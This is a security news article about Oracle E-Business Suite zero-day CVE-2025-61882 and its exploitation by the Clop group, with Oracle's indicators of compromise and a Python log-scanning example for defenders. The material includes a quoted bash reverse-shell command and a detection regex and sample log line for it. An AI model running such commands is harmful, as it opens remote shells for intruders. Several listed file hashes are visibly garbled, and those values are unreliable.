EBS Zero-Day Exploited in Clop Data Theft Attack Patched by Oracle


“EBS zero-day, which was exploited in the Clop data theft attack, is now patched by Oracle.”

Oracle is alerting users to a critical E-Business Suite zero-day vulnerability, tracked as CVE-2025-61882, that allows unauthenticated remote code execution. The vulnerability is being exploited in Clop data theft attacks.

The flaw is in the Oracle Concurrent Processing product of Oracle E-Business Suite (component: BI Publisher Integration) and has a CVSS base score of 9.8, owing to its ease of exploitation and lack of authentication.

Oracle advisory

“The Oracle E-Business Suite vulnerability CVE-2025-61882 is addressed by this Security Alert.”

“This vulnerability can be exploited without authentication, which means that a username and password are not required to exploit it over a network. If successfully exploited, this vulnerability may result in remote code execution.”

Oracle has released an emergency update to fix the zero-day vulnerability, which was confirmed to affect Oracle E-Business Suite 12.2.3-12.14. According to the company, customers must first install the October 2023 Critical Patch Update before they can apply the new security updates.

Oracle administrators should install the security update as soon as possible because a public PoC exploit exists and the vulnerability is being actively exploited.

Attacks

Although Oracle did not say that this is a zero-day vulnerability, it shared indicators of compromise that match an Oracle EBS exploit recently published by threat actors on Telegram.

The Clop ransomware group used this vulnerability in data theft attacks in August 2025, according to Charles Carmakal, CTO of Mandiant, part of Google Cloud.

Charles Carmakal

“Clop exploited multiple vulnerabilities in Oracle EBS, which enabled them to steal large quantities of data from many victims in August 2025,” Carmakal told BleepingComputer.

“Many vulnerabilities were exploited, including those that were patched this weekend (CVE-2025-61882) and another fixed in the Oracle 2025 update,” Carmakal added.

CVE-2025-61882 is a vulnerability (CVSS 9.8) that allows unauthenticated remote code execution.

News of Clop's latest extortion campaign first broke last week, when Mandiant and the Google Threat Intelligence Group (GTIG) announced that they were tracking a new campaign in which many companies received emails claiming to be from the threat actors.

According to these emails, Clop stole information from the companies' Oracle E-Business Suite systems and demanded a ransom to keep the information private.

CL0p team

“We are the CL0P team. You can Google us online if you haven’t heard about us.”

“We have just stolen many documents from the Oracle E-Business Suite application. Our systems now hold all the other files and other data.”

However, Oracle first linked the Clop extortion campaign to vulnerabilities that were patched in July 2025, rather than to the new zero-day that we now know was used in the attacks.

Oracle has now shared indicators of compromise for the zero-day exploitation, including the exploit archive and related files, a command used to open a remote shell, and IP addresses.

  • 200[.]107[.]207[.]26 – IP address associated with observed exploitation (HTTP GET and POST requests).
  • 185[.]181[.]60[.]11 – IP address associated with observed exploitation (HTTP GET and POST requests).
  • sh -c /bin/bash -i >& /dev/tcp// 0>&1 – Command executed by the exploit to open a reverse shell.
  • 76B6D36e04E367a234c445B51ECCE97E4C614E88dfb4f72B104CA0f31235d – Oracle_bs_nday_Exploit_poc_scited_lapsus_CL0p_hunters.zip
  • AA0D3859D6633B62BCCFB69017D33A8979a3be1f3f0a5a4BFFFFFFPFPFFPFFFPFFPFFPFFF6960D6C73d41121-Oracle_ebs_nday_Exploit_poc_scited_lapsus_retard-CL0p_HUNTERS
  • 6FD538E4A8E493dda6F9FCDC96E814BD14F3E2EF8AA46F0143BFFFFFAFAD82C1B-Oracle_bs_NDY_Exploit_poc_scited_lapsus_RTARD-Cleard.
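A sweep for the network and command-line indicators in the list above could look like the following. This is an added example, not code from Oracle or from the original article; it assumes a common/combined-format web access log and a process or audit log that records full command lines, and all sample log lines, paths, the `applmgr` user and the `192.0.2.10` address are constructed placeholders.

```python
import re
from ipaddress import ip_address

# IP indicators from the list above, re-fanged for matching.
IOC_IPS = {ip_address("200.107.207.26"), ip_address("185.181.60.11")}
# Reverse-shell shape from the list above: interactive bash redirected to /dev/tcp.
REVSHELL_RE = re.compile(r"bash\s+-i\s*>\s*&\s*/dev/tcp/", re.IGNORECASE)
# Common/combined log prefix: client ident user [time] "METHOD path proto" status
ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+)[^"]*" (\d{3})')

def scan_access_log(lines):
    """Return (line_no, ip, method, path, status) for every request from an IOC IP."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = ACCESS_RE.match(line)
        if not m:
            continue  # not an access-log record
        try:
            src = ip_address(m.group(1))
        except ValueError:
            continue  # client field is a hostname or malformed
        if src in IOC_IPS:
            hits.append((n, str(src), m.group(3), m.group(4), int(m.group(5))))
    return hits

def scan_command_lines(lines):
    """Return line numbers of records containing the reverse-shell shape."""
    return [n for n, line in enumerate(lines, 1) if REVSHELL_RE.search(line)]

# Constructed sample data (not real logs); request paths are placeholders.
SAMPLE_ACCESS = [
    '10.0.0.5 - - [05/Oct/2025:10:00:01 +0000] "GET /placeholder/home HTTP/1.1" 200 512',
    '200.107.207.26 - - [05/Oct/2025:10:00:07 +0000] "POST /placeholder/endpoint HTTP/1.1" 200 88',
    '185.181.60.11 - - [05/Oct/2025:10:01:12 +0000] "GET /placeholder/endpoint HTTP/1.1" 404 0',
    'proxy.internal - - [05/Oct/2025:10:02:00 +0000] "GET / HTTP/1.1" 200 10',
]
SAMPLE_PROCS = [
    'pid=4021 user=applmgr cmd="sh -c /bin/bash -i >& /dev/tcp/192.0.2.10/4444 0>&1"',
    'pid=4022 user=applmgr cmd="/bin/bash /u01/scripts/nightly.sh"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_ACCESS):
        print("access-log IOC:", hit)
    print("reverse-shell lines:", scan_command_lines(SAMPLE_PROCS))
```

A hit on either check is a reason to preserve logs and investigate the host, not proof of compromise on its own; absence of hits does not rule out exploitation from other addresses.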


Exploit leaked by Scattered Lapsus$ Hunters

Although Clop is responsible for the exploitation of the Oracle zero-day and the data theft attacks, news of the zero-day first came from a different group of threat actors who recently made headlines with widespread data theft attacks against Salesforce customers.

These actors, who call themselves “Scattered Lapsus$ Hunters” and say they consist of threat actors from ShinyHunters, Lapsus$ and Scattered Spider, posted two files on Telegram on Friday that they claimed had nothing to do with the Clop attacks.

One file, named “GIFE_FROM_CL0P.7Z”, contains Oracle source code that appears to be linked to “support.oracle.com” based on the file names.

However, the threat actors also released the archive “Oracle_bs_nday_exploit_poc_scatred_lapsus_retard_cl0p_hunters.zip”, whose file name suggests it is the Oracle E-Business Suite exploit used by Clop.

According to BleepingComputer, this file is the same one that appears in Oracle's indicators of compromise.

The archive contains a readme.md file and two Python scripts, exp.py and server.py. By exploiting a vulnerable Oracle E-Business Suite instance, the Python scripts can either run an arbitrary command or open a reverse shell to the threat actor's servers.

Because Oracle's IOCs list the name of the exploit archive shared by Scattered Lapsus$ Hunters, it is now established that the Clop ransomware gang used this exploit.

However, this raises questions about how the Scattered Lapsus$ Hunters threat actors obtained the exploit and whether they are collaborating with Clop.

BleepingComputer contacted representatives of ShinyHunters and Clop to ask about this relationship but has not yet heard back.

About the author

Suraj Cole is a content specialist in technical writing about cybersecurity and information security. He has written many amazing articles on cybersecurity concepts, covering the latest trends in cyber awareness and ethical hacking.
